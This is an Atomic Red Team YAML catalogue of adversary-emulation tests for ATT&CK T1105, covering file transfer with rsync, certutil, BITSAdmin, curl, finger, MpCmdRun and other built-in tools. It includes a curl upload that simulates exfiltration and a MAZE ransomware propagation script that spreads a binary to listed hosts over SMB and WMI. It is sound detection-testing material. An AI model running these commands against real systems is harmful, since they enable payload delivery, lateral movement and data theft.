
# Atomic Red Team catalogue for ATT&CK T1105 (Ingress Tool Transfer).
# Each entry under atomic_tests names one tool, its input arguments,
# the prerequisites that must hold, the executor, and (where present)
# the cleanup that reverses the test's side effects.
attack_technique: T1105
display_name: Ingress Tool Transfer
atomic_tests:
# rsync push: recursively copies local_path to remote_host:remote_path over ssh-style
# user@host addressing. Runs under sh and is marked as requiring elevation.
- name: rsync remote file copy (push)
  auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409
  description: |
    Utilize rsync to perform a remote file copy (push)
  supported_platforms:
  - linux
  - macos
  input_arguments:
    remote_path:
      description: Remote path to receive rsync
      type: path
      default: /tmp/victim-files
    remote_host:
      description: Remote host to copy toward
      type: string
      default: victim-host
    local_path:
      description: Path of folder to copy
      type: path
      default: /tmp/adversary-rsync/
    username:
      description: User account to authenticate on remote host
      type: string
      default: victim
  dependency_executor_name: sh
  dependencies:
  - description: |
      rsync must be installed on the machine
    # Succeeds only when an executable rsync is on PATH.
    prereq_command: |
      if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi
    get_prereq_command: |
      (pkg install -y rsync)||(sudo apt-get -y install rsync)
  executor:
    name: sh
    elevation_required: true
    command: |
      rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
# rsync pull: the mirror of the push test -- fetches remote_host:remote_path into
# local_path. Same rsync prerequisite; no elevation flag is set on this one.
- name: rsync remote file copy (pull)
  auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f
  description: |
    Utilize rsync to perform a remote file copy (pull)
  supported_platforms:
  - linux
  - macos
  input_arguments:
    remote_path:
      description: Path of folder to copy
      type: path
      default: /tmp/adversary-rsync/
    remote_host:
      description: Remote host to copy from
      type: string
      default: adversary-host
    local_path:
      description: Local path to receive rsync
      type: path
      default: /tmp/victim-files
    username:
      description: User account to authenticate on remote host
      type: string
      default: adversary
  dependency_executor_name: sh
  dependencies:
  - description: |
      rsync must be installed on the machine
    prereq_command: |
      if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi
    get_prereq_command: |
      (pkg install -y rsync)||(sudo apt-get -y install rsync)
  executor:
    name: sh
    command: |
      rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
# scp push: copies a single local_file to user@remote_host:remote_path.
# No dependency block -- scp is assumed present on the listed platforms.
- name: scp remote file copy (push)
  auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344
  description: |
    Utilize scp to perform a remote file copy (push)
  supported_platforms:
  - linux
  - macos
  input_arguments:
    remote_path:
      description: Remote path to receive scp
      type: path
      default: /tmp/victim-files/
    local_file:
      description: Path of file to copy
      type: path
      default: /tmp/adversary-scp
    remote_host:
      description: Remote host to copy toward
      type: string
      default: victim-host
    username:
      description: User account to authenticate on remote host
      type: string
      default: victim
  executor:
    name: sh
    command: |
      scp #{local_file} #{username}@#{remote_host}:#{remote_path}
# scp pull: retrieves user@remote_host:remote_file into local_path.
- name: scp remote file copy (pull)
  auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33
  description: |
    Utilize scp to perform a remote file copy (pull)
  supported_platforms:
  - linux
  - macos
  input_arguments:
    remote_host:
      description: Remote host to copy from
      type: string
      default: adversary-host
    local_path:
      description: Local path to receive scp
      type: path
      default: /tmp/victim-files/
    remote_file:
      description: Path of file to copy
      type: path
      default: /tmp/adversary-scp
    username:
      description: User account to authenticate on remote host
      type: string
      default: adversary
  executor:
    name: sh
    command: |
      scp #{username}@#{remote_host}:#{remote_file} #{local_path}
# sftp push: feeds a single `put` to an interactive sftp session via a here-string.
# The `<<< $'...'` form is a bash feature, which is why the executor is bash, not sh.
- name: sftp remote file copy (push)
  auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e
  description: |
    Utilize sftp to perform a remote file copy (push)
  supported_platforms:
  - linux
  - macos
  input_arguments:
    remote_path:
      description: Remote path to receive sftp
      type: path
      default: /tmp/victim-files/
    local_file:
      description: Path of file to copy
      type: path
      default: /tmp/adversary-sftp
    remote_host:
      description: Remote host to copy toward
      type: string
      default: victim-host
    username:
      description: User account to authenticate on remote host
      type: string
      default: victim
  executor:
    name: bash
    command: |
      sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
# sftp pull: non-interactive fetch of user@remote_host:remote_file into local_path.
- name: sftp remote file copy (pull)
  auto_generated_guid: 0139dba1-f391-405e-a4f5-f3989f2c88ef
  description: |
    Utilize sftp to perform a remote file copy (pull)
  supported_platforms:
  - linux
  - macos
  input_arguments:
    remote_host:
      description: Remote host to copy from
      type: string
      default: adversary-host
    local_path:
      description: Local path to receive sftp
      type: path
      default: /tmp/victim-files/
    remote_file:
      description: Path of file to copy
      type: path
      default: /tmp/adversary-sftp
    username:
      description: User account to authenticate on remote host
      type: string
      default: adversary
  executor:
    name: sh
    command: |
      sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
# certutil -urlcache: fetches remote_file through certutil's URL cache and writes it
# to local_path; cleanup deletes that file. Default local_path is relative to the
# working directory of the executor.
- name: certutil download (urlcache)
  auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0
  description: |
    Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works!
  supported_platforms:
  - windows
  input_arguments:
    remote_file:
      description: URL of file to copy
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
    local_path:
      description: Local path to place file
      type: path
      default: Atomic-license.txt
  executor:
    name: command_prompt
    command: |
      cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
    cleanup_command: |
      del #{local_path} >nul 2>&1
# certutil -verifyctl: works inside a date-stamped scratch directory, then moves every
# non-.txt file certutil produced to local_path. Cleanup recomputes the same directory
# name from today's date, so a run that straddles midnight will leave it behind.
- name: certutil download (verifyctl)
  auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b
  description: |
    Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works!
  supported_platforms:
  - windows
  input_arguments:
    remote_file:
      description: URL of file to copy
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
    local_path:
      description: Local path to place file
      type: path
      default: Atomic-license.txt
  executor:
    name: powershell
    command: |
      $datePath = "certutil-$(Get-Date -format yyyy_MM_dd)"
      New-Item -Path $datePath -ItemType Directory
      Set-Location $datePath
      certutil -verifyctl -split -f #{remote_file}
      Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }
    cleanup_command: |
      Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorAction Ignore
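# BITSAdmin: schedules a high-priority BITS transfer job named bits_job_name that
# writes remote_file to local_path. Sibling download tests remove the fetched file;
# this one previously did not, so a cleanup_command deleting local_path is added
# (same form as the certutil urlcache test).
- name: Windows - BITSAdmin BITS Download
  auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b
  description: |
    This test uses BITSAdmin.exe to schedule a BITS job for the download of a file.
    This technique is used by Qbot malware to download payloads.
  supported_platforms:
  - windows
  input_arguments:
    bits_job_name:
      description: Name of the created BITS job
      type: string
      default: qcxjb7
    local_path:
      description: Local path to place file
      type: path
      default: '%temp%\Atomic-license.txt'
    remote_file:
      description: URL of file to copy
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
  executor:
    name: command_prompt
    command: |
      C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path}
    # Remove the downloaded file; errors (file absent) are suppressed.
    cleanup_command: |
      del #{local_path} >nul 2>&1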
# PowerShell WebClient.DownloadFile: writes remote_file to destination_path; cleanup
# removes it. destination_path is quoted here because the default contains a
# backslash and a `$env:` reference that PowerShell, not YAML, must expand.
- name: Windows - PowerShell Download
  auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8
  description: |
    This test uses PowerShell to download a payload.
    This technique is used by multiple adversaries and malware families.
  supported_platforms:
  - windows
  input_arguments:
    remote_file:
      description: URL of file to copy
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
    destination_path:
      description: Destination path to file
      type: path
      default: '$env:TEMP\Atomic-license.txt'
  executor:
    name: powershell
    command: |
      (New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}")
    cleanup_command: |
      Remove-Item #{destination_path} -Force -ErrorAction Ignore
# OSTap emulation: from destination_path (default: the local C$ admin share) writes a
# small JScript file, runs it with CScript to create a second file, then deletes both.
# The command does its own cleanup inline, so there is no separate cleanup_command.
- name: OSTAP Worming Activity
  auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad
  description: |
    OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity.
  supported_platforms:
  - windows
  input_arguments:
    destination_path:
      description: Path to create remote file at. Default is local admin share.
      type: string
      default: '\\localhost\C$'
  executor:
    name: command_prompt
    elevation_required: true
    command: |
      pushd #{destination_path}
      echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js
      CScript.exe AtomicTestT1105.js //E:JScript
      del AtomicTestT1105.js /Q >nul 2>&1
      del AtomicTestFileT1105.js /Q >nul 2>&1
      popd
# Masquerading cmd.exe as C:\svchost.exe and using it to write T1105.txt through the
# local C$ share. Cleanup removes both artifacts.
# NOTE(review): the cleanup spells the copy target as C:\\svchost.exe (doubled
# separator) while the command writes C:\svchost.exe; cmd tolerates this, but
# the two lines would be easier to audit if they matched.
- name: svchost writing a file to a UNC path
  auto_generated_guid: fa5a2759-41d7-4e13-a19c-e8f28a53566f
  description: |
    svchost.exe writing a non-Microsoft Office file to a file with a UNC path.
    Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with output to a txt file.
  supported_platforms:
  - windows
  executor:
    name: command_prompt
    elevation_required: true
    command: |
      copy C:\Windows\System32\cmd.exe C:\svchost.exe
      C:\svchost.exe /c echo T1105 > \\localhost\c$\T1105.txt
    cleanup_command: |
      del C:\T1105.txt >nul 2>&1
      del C:\\svchost.exe >nul 2>&1
# MpCmdRun.exe -DownloadFile: changes into the Defender platform folder matching
# 4.18* and downloads remote_file to local_path. Cleanup removes the file and the
# MpCmdRun.log that the tool leaves in %temp%.
- name: Download a File with Windows Defender MpCmdRun.exe
  auto_generated_guid: 815bef8b-bf91-4b67-be4c-abe4c2a94ccc
  description: |
    Uses Windows Defender MpCmdRun.exe to download a file from the internet (must have version 4.18 installed).
    The input arguments "remote_file" and "local_path" can be used to specify the download URL and the name of the output file.
    By default, the test downloads the Atomic Red Team license file to the temp directory.
    More info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/
  supported_platforms:
  - windows
  input_arguments:
    remote_file:
      description: URL of file to download
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
    local_path:
      description: Location to save downloaded file
      type: path
      default: '%temp%\Atomic-license.txt'
  dependencies:
  - description: 'Must have a Windows Defender version with MpCmdRun.exe installed'
    # Passes only if the platform folder exists and MpCmdRun.exe answers /?.
    prereq_command: |
      cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*"
      MpCmdRun.exe /? >nul 2>&1
    get_prereq_command: Echo "A version of Windows Defender with MpCmdRun.exe must be installed manually"
  executor:
    name: command_prompt
    command: |
      cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*"
      MpCmdRun.exe -DownloadFile -url #{remote_file} -path #{local_path}
    cleanup_command: |-
      del #{local_path} >nul 2>&1
      del %temp%\MpCmdRun.log >nul 2>&1
# whois as a transfer channel: sends `query` to remote_host:remote_port and captures
# whatever comes back into output_file. `timeout --preserve-status` bounds the run to
# `timeout` seconds while keeping whois's own exit code. Defaults point at localhost.
- name: whois file download
  auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab
  description: |
    Download a remote file using the whois utility
  supported_platforms:
  - linux
  - macos
  input_arguments:
    remote_host:
      description: Remote hostname or IP address
      type: string
      default: localhost
    remote_port:
      description: Remote port to connect to
      type: integer
      default: 8443
    output_file:
      description: Path of file to save output to
      type: path
      default: /tmp/T1105.whois.out
    query:
      description: Query to send to remote server
      type: string
      default: 'Hello from Atomic Red Team test T1105'
    timeout:
      description: Timeout period before ending process (seconds)
      type: integer
      default: 1
  dependencies:
  - description: |
      The whois and timeout commands must be present
    prereq_command: |
      which whois && which timeout
    get_prereq_command: |
      echo "Please install timeout and the whois package"
  executor:
    name: sh
    elevation_required: false
    command: |
      timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file}
    cleanup_command: |
      rm -f #{output_file}
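# WebClient.DownloadString piped to Out-File, then Invoke-Item opens the result.
# The original entry left output_file (default LICENSE.txt in the working directory)
# on disk; a cleanup_command matching the "Windows - PowerShell Download" test is added.
- name: File Download via PowerShell
  auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2
  description: |
    Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary.
  supported_platforms:
  - windows
  input_arguments:
    target_remote_file:
      description: File to download
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt
    output_file:
      description: File to write to
      type: string
      default: LICENSE.txt
  executor:
    name: powershell
    command: |
      (New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file}
    # Remove the written file; Invoke-Item does not hold it open.
    cleanup_command: |
      Remove-Item #{output_file} -Force -ErrorAction Ignore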
# finger.exe as a download primitive: queries user "base64_filedata" on remote_host.
# With the default of localhost no finger service answers, so the expected outcome
# is a failed connection attempt (which is the observable event of interest).
- name: File download with finger.exe on Windows
  auto_generated_guid: 5f507e45-8411-4f99-84e7-e38530c45d01
  description: |
    Simulate a file download using finger.exe. Connect to localhost by default, use custom input argument to test finger connecting to an external server.
    Because this is being tested on the localhost, you should not be expecting a successful connection
    https://www.exploit-db.com/exploits/48815
    https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/
  supported_platforms:
  - windows
  input_arguments:
    remote_host:
      description: Remote hostname or IP address
      type: string
      default: localhost
  executor:
    name: command_prompt
    command: |
      finger base64_filedata@#{remote_host}
# IMEWDBLD.exe (IME dictionary loader) fetches remote_url into the user's INetCache;
# the tool then errors because the payload is not a dictionary. Cleanup searches
# INetCache for file_name* and removes the matches.
- name: Download a file with IMEWDBLD.exe
  auto_generated_guid: 1a02df58-09af-4064-a765-0babe1a0d1e2
  description: |
    Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file.
    Downloaded files can be found in "%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>" or `%LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>.
    Run "Get-ChildItem -Path C:\Users\<USERNAME>\AppData\Local\Microsoft\Windows\INetCache\ -Include <FILENAME>* -Recurse -Force -File -ErrorAction SilentlyContinue" without quotes and adding the correct username and file name to locate the file.
  supported_platforms:
  - windows
  input_arguments:
    remote_url:
      description: Location of file to be downloaded.
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml
    file_name:
      description: Name of the file to be downloaded without extension.
      type: string
      default: T1105
  executor:
    name: powershell
    command: |
      $imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe"
      & $imewdbled #{remote_url}
    cleanup_command: |
      $inetcache = $env:LOCALAPPDATA + "\Microsoft\Windows\INetCache\"
      $file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue)
      if("" -ne "$file_to_be_removed") { Remove-Item "$file_to_be_removed" -ErrorAction Ignore }
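# curl.exe download: fetches file_download four times (-o and --output are the same
# flag) into three locations. `-k` disables TLS certificate verification, so the
# transfers are also visible as unverified HTTPS from curl.exe.
# The cleanup listed the public\music path twice; the duplicate line is dropped --
# the first `del` already removes the file both `-o` and `--output` wrote.
# NOTE(review): get_prereq_command copies curl.exe into C:\Windows\System32, which
# only succeeds from an elevated session even though the executor itself is not
# marked elevation_required.
- name: Curl Download File
  auto_generated_guid: 2b080b99-0deb-4d51-af0f-833d37c4ca6a
  description: |
    The following Atomic utilizes native curl.exe, or downloads it if not installed, to download a remote DLL and output to a number of directories to simulate malicious behavior.
    Expected output will include whether the file downloaded successfully or not.
  supported_platforms:
  - windows
  input_arguments:
    file_download:
      description: File to download
      type: string
      default: https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll
    curl_path:
      description: path to curl.exe
      type: path
      default: 'C:\Windows\System32\Curl.exe'
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Curl must be installed on system.
    prereq_command: |
      if (Test-Path #{curl_path}) {exit 0} else {exit 1}
    get_prereq_command: |
      Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
      Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
      Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe" C:\Windows\System32\Curl.exe
      Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl"
      Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
  executor:
    name: command_prompt
    command: |
      #{curl_path} -k #{file_download} -o c:\users\public\music\allthethingsx64.dll
      #{curl_path} -k #{file_download} --output c:\users\public\music\allthethingsx64.dll
      #{curl_path} -k #{file_download} -o c:\programdata\allthethingsx64.dll
      #{curl_path} -k #{file_download} -o %Temp%\allthethingsx64.dll
    cleanup_command: |
      del c:\users\public\music\allthethingsx64.dll >nul 2>&1
      del c:\programdata\allthethingsx64.dll >nul 2>&1
      del %Temp%\allthethingsx64.dll >nul 2>&1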
# curl.exe upload: sends file_path to remote_destination four ways (-T / --upload-file
# are PUT-style; -d / --data are POST-style). A second dependency creates the text
# file to upload if it does not exist. Nothing is cleaned up afterwards.
# NOTE(review): `-d #{file_path}` passes the path as the POST body text rather than
# the file contents, so the last two requests carry only the path string; the `-T`
# forms are the ones that actually transmit the file.
- name: Curl Upload File
  auto_generated_guid: 635c9a38-6cbf-47dc-8615-3810bc1167cf
  description: |
    The following Atomic utilizes native curl.exe, or downloads it if not installed, to upload a txt file to simulate data exfiltration
    Expected output will include whether the file uploaded successfully or not.
  supported_platforms:
  - windows
  input_arguments:
    curl_path:
      description: path to curl.exe
      type: path
      default: 'C:\Windows\System32\Curl.exe'
    remote_destination:
      description: Remote destination
      type: string
      default: www.example.com
    file_path:
      description: File to upload
      type: string
      default: 'c:\temp\atomictestfile.txt'
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Curl must be installed on system.
    prereq_command: |
      if (Test-Path #{curl_path}) {exit 0} else {exit 1}
    get_prereq_command: |
      Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile PathToAtomicsFolder\..\ExternalPayloads\curl.zip
      Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
      Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe" C:\Windows\System32\Curl.exe
      Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl"
      Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
  - description: |
      A file must be created to upload
    prereq_command: |
      if (Test-Path #{file_path}) {exit 0} else {exit 1}
    get_prereq_command: |
      echo "This is an Atomic Test File" > #{file_path}
  executor:
    name: command_prompt
    command: |
      #{curl_path} -T #{file_path} #{remote_destination}
      #{curl_path} --upload-file #{file_path} #{remote_destination}
      #{curl_path} -d #{file_path} #{remote_destination}
      #{curl_path} --data #{file_path} #{remote_destination}
# cmdl32.exe auto-download: runs the batch script at Path_to_file (fetched from the
# repo if missing) with stdout discarded. Cleanup removes the %temp%\T1105 folder
# the script works in.
- name: Download a file with Microsoft Connection Manager Auto-Download
  auto_generated_guid: d239772b-88e2-4a2e-8473-897503401bcc
  description: |
    Uses the cmdl32 to download arbitrary file from the internet. The cmdl32 package is allowed to install the profile used to launch the VPN connection. However, the config is modified to download the arbitary file.
    The issue of cmdl32.exe detecting and deleting the payload by identifying it as not a VPN Servers profile is avoided by setting a temporary TMP folder and denying the delete permission to all files for the user.
    Upon successful execution the test will open calculator and Notepad executable for 10 seconds.
    reference:
    https://twitter.com/ElliotKillick/status/1455897435063074824
    https://github.com/LOLBAS-Project/LOLBAS/pull/151
    https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/
    https://strontic.github.io/xcyclopedia/library/cmdl32.exe-FA1D5B8802FFF4A85B6F52A52C871BBB.html
  supported_platforms:
  - windows
  input_arguments:
    Path_to_file:
      description: Path to the Batch script
      type: path
      default: 'PathToAtomicsFolder\T1105\src\T1105.bat'
  dependency_executor_name: powershell
  dependencies:
  - description: |
      #{Path_to_file} must exist on system.
    prereq_command: |
      if (Test-Path "#{Path_to_file}") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory (split-path "#{Path_to_file}") -ErrorAction ignore | Out-Null
      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.bat" -OutFile "#{Path_to_file}"
  executor:
    name: command_prompt
    command: |
      "#{Path_to_file}" 1>NUL
    cleanup_command: |
      del /f/s/q %temp%\T1105 >nul 2>&1
      rmdir /s/q %temp%\T1105 >nul 2>&1
# MAZE propagation emulation: for each host in T1105MachineList.txt that answers one
# ping, copies binary_file to \\host\<drive>$<exe_remote_folder>, records the host in
# CompletedHosts, and launches regsvr32.exe on it through WMI; unreachable hosts go
# to OfflineHosts. Cleanup terminates the remote regsvr32 and deletes the copied
# binary on every completed host, then removes both host lists.
# The machine list is created empty by get_prereq_command and must be populated
# by hand before the test does anything.
- name: MAZE Propagation Script
  auto_generated_guid: 70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf
  description: |
    This test simulates MAZE ransomware's propogation script that searches through a list of computers, tests connectivity to them, and copies a binary file to the Windows\Temp directory of each one.
    Upon successful execution, a specified binary file will attempt to be copied to each online machine, a list of the online machines, as well as a list of offline machines will be output to a specified location.
    Reference: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
  supported_platforms:
  - windows
  input_arguments:
    binary_file:
      description: Binary file to copy to remote machines
      type: string
      default: '$env:comspec'
    exe_remote_folder:
      description: Path to store executable on remote machine (no drive letter)
      type: string
      default: '\Windows\Temp\T1105.exe'
    remote_drive_letter:
      description: Remote drive letter
      type: string
      default: C
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Binary file must exist at specified location (#{binary_file})
    prereq_command: |
      if (Test-Path #{binary_file}) {exit 0} else {exit 1}
    get_prereq_command: |
      write-host "The binary_file input parameter must be set to a binary that exists on this computer."
  - description: |
      Machine list must exist at specified location ("PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt")
    prereq_command: |
      if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
      new-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt" | Out-Null
      echo "A machine list file has been generated at "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt". Please enter the machines to target there, one machine per line."
  executor:
    name: powershell
    command: |
      $machine_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt"
      $offline_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105OfflineHosts.txt"
      $completed_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt"
      foreach ($machine in get-content -path "$machine_list")
      {if (test-connection -Count 1 -computername $machine -quiet)
      {cmd /c copy "#{binary_file}" "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}"
      echo $machine >> "$completed_list"
      wmic /node: "$machine" process call create "regsvr32.exe /i #{remote_drive_letter}:#{exe_remote_folder}"}
      else
      {echo $machine >> "$offline_list"}}
    cleanup_command: |
      if (test-path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt")
      {foreach ($machine in get-content -path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt")
      {wmic /node: "$machine" process where name='"regsvr32.exe"' call terminate | out-null
      Remove-Item -path "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}" -force -erroraction silentlycontinue}}
      Remove-Item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105OfflineHosts.txt" -erroraction silentlycontinue
      Remove-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt" -erroraction silentlycontinue
# PrintBrm.exe backup mode: packs the folder at Path_unc (default: the local C$ share
# path of this technique's src folder) into %TEMP%\PrintBrm.zip. The command first
# deletes any stale archive; cleanup deletes the new one.
- name: Printer Migration Command-Line Tool UNC share folder into a zip file
  auto_generated_guid: 49845fc1-7961-4590-a0f0-3dbcf065ae7e
  description: |
    Create a ZIP file from a folder in a remote drive
  supported_platforms:
  - windows
  input_arguments:
    Path_unc:
      description: Path to the UNC folder
      type: path
      default: '\\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\'
    Path_PrintBrm:
      description: Path to PrintBrm.exe
      type: path
      default: 'C:\Windows\System32\spool\tools\PrintBrm.exe'
  executor:
    name: command_prompt
    command: |
      del %TEMP%\PrintBrm.zip >nul 2>&1
      #{Path_PrintBrm} -b -d #{Path_unc} -f %TEMP%\PrintBrm.zip -O FORCE
    cleanup_command: |
      del %TEMP%\PrintBrm.zip >nul 2>&1
# replace.exe /A: adds replace_cab (fetched from the repo if missing) into %TEMP%.
# The command clears any earlier copy first; cleanup removes the added file.
- name: Lolbas replace.exe use to copy file
  auto_generated_guid: 54782d65-12f0-47a5-b4c1-b70ee23de6df
  description: |
    Copy file.cab to destination
    Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/
  supported_platforms:
  - windows
  input_arguments:
    replace_cab:
      description: Path to the cab file
      type: path
      default: 'PathToAtomicsFolder\T1105\src\redcanary.cab'
    Path_replace:
      description: Path to replace.exe
      type: path
      default: 'C:\Windows\System32\replace.exe'
  dependency_executor_name: powershell
  dependencies:
  - description: |
      #{replace_cab} must exist on system.
    prereq_command: |
      if (Test-Path "#{replace_cab}") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory (split-path "#{replace_cab}") -ErrorAction ignore | Out-Null
      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/redcanary.cab" -OutFile "#{replace_cab}"
  executor:
    name: command_prompt
    command: |
      del %TEMP%\redcanary.cab >nul 2>&1
      #{Path_replace} "#{replace_cab}" %TEMP% /A
    cleanup_command: |
      del %TEMP%\redcanary.cab >nul 2>&1
# UNC variant of the replace.exe test: the source cab is addressed through the local
# C$ share instead of a local path, so the copy shows up as SMB file access.
# No dependency block -- the cab is expected to already be present.
- name: Lolbas replace.exe use to copy UNC file
  auto_generated_guid: ed0335ac-0354-400c-8148-f6151d20035a
  description: |
    Copy UNC file to destination
    Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/
  supported_platforms:
  - windows
  input_arguments:
    replace_cab:
      description: UNC Path to the cab file
      type: path
      default: '\\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\redcanary.cab'
    Path_replace:
      description: Path to replace.exe
      type: path
      default: 'C:\Windows\System32\replace.exe'
  executor:
    name: command_prompt
    command: |
      del %TEMP%\redcanary.cab >nul 2>&1
      #{Path_replace} #{replace_cab} %TEMP% /A
    cleanup_command: |
      del %TEMP%\redcanary.cab >nul 2>&1
# certreq -Post: submits c:\windows\win.ini as the request body to remote_file and
# stores the HTTP response in local_path -- i.e. the "download" is the server reply
# to an outbound POST. Cleanup deletes local_path.
- name: certreq download
  auto_generated_guid: 6fdaae87-c05b-42f8-842e-991a74e8376b
  description: Use certreq to download a file from the web
  supported_platforms:
  - windows
  input_arguments:
    local_path:
      description: Local path to place file
      type: string
      default: '%temp%\Atomic-license.txt'
    remote_file:
      description: URL of file to copy
      type: url
      default: https://example.com
  executor:
    name: command_prompt
    command: 'certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}'
    cleanup_command: 'del #{local_path} >nul 2>&1'
# wscript.exe runs the VBScript at vbscript_file (fetched from the repo if absent).
# The cleanup removes Atomic-License.txt from the working directory, which is where
# the script is expected to write; the script's own contents are not on this page.
- name: Download a file using wscript
  auto_generated_guid: 97116a3f-efac-4b26-8336-b9cb18c45188
  description: Use wscript to run a local VisualBasic file to download a remote file
  supported_platforms:
  - windows
  input_arguments:
    vbscript_file:
      description: Full path to the VisualBasic downloading the file
      type: string
      default: 'PathToAtomicsFolder\T1105\src\T1105-download-file.vbs'
